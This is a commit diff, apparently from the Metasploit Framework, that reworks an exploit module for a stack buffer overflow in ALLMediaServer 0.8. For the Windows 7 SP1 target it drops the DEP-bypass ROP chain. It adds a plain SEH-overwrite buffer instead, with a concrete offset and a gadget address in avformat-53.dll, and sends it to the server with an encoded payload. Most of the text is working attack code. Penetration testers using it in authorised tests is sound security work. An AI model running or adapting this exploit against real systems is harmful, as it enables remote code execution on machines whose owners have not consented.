Target W7 updated

unstable
jvazquez-r7 2012-07-15 17:45:58 +02:00
parent e1ff6b0cef
commit 8cf08c6ca3
1 changed files with 20 additions and 12 deletions

View File

@ -17,9 +17,13 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info, super(update_info(info,
'Name' => 'ALLMediaServer 0.8 Buffer Overflow', 'Name' => 'ALLMediaServer 0.8 Buffer Overflow',
'Description' => %q{ 'Description' => %q{
This module exploits a stack buffer overflow in ALLMediaServer 0.8. This module exploits a stack buffer overflow in ALLMediaServer 0.8. The vulnerability
The vulnerability is caused due to a boundary error within the is caused due to a boundary error within the handling of HTTP request.
handling of HTTP request.
While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't
reliable across virtual (VMWare, VirtualBox) and physical environments. Because of
this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default
DEP is OptIn and AllMediaServer won't run with DEP.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
@ -56,9 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
], ],
[ 'ALLMediaServer 0.8 / Windows 7 SP1 - English', [ 'ALLMediaServer 0.8 / Windows 7 SP1 - English',
{ {
'Ret' => 0x65ec74dc, # ADD ESP,6CC # POP # POP # POP # RET - avcoded-53.dll 'Ret' => 0x6ac5cc92, # ppr from avformat-53.dll
'OffsetRop' => 332,
'jmp' => 628,
'Offset' => 1072 'Offset' => 1072
} }
], ],
@ -109,12 +111,18 @@ class Metasploit3 < Msf::Exploit::Remote
connect connect
if target.name =~ /Windows 7/
buffer = rand_text(target['Offset'])
buffer << generate_seh_record(target.ret)
buffer << payload.encoded
else
buffer = rand_text(target['OffsetRop']) #junk buffer = rand_text(target['OffsetRop']) #junk
buffer << rop buffer << rop
buffer << asm("jmp $+0x#{target['jmp'].to_s(16)}") # jmp to payload buffer << asm("jmp $+0x#{target['jmp'].to_s(16)}") # jmp to payload
buffer << rand_text(target['Offset'] - buffer.length) buffer << rand_text(target['Offset'] - buffer.length)
buffer << generate_seh_record(target.ret) buffer << generate_seh_record(target.ret)
buffer << payload.encoded buffer << payload.encoded
end
print_status("Sending payload to ALLMediaServer on #{target.name}...") print_status("Sending payload to ALLMediaServer on #{target.name}...")
sock.put(buffer) sock.put(buffer)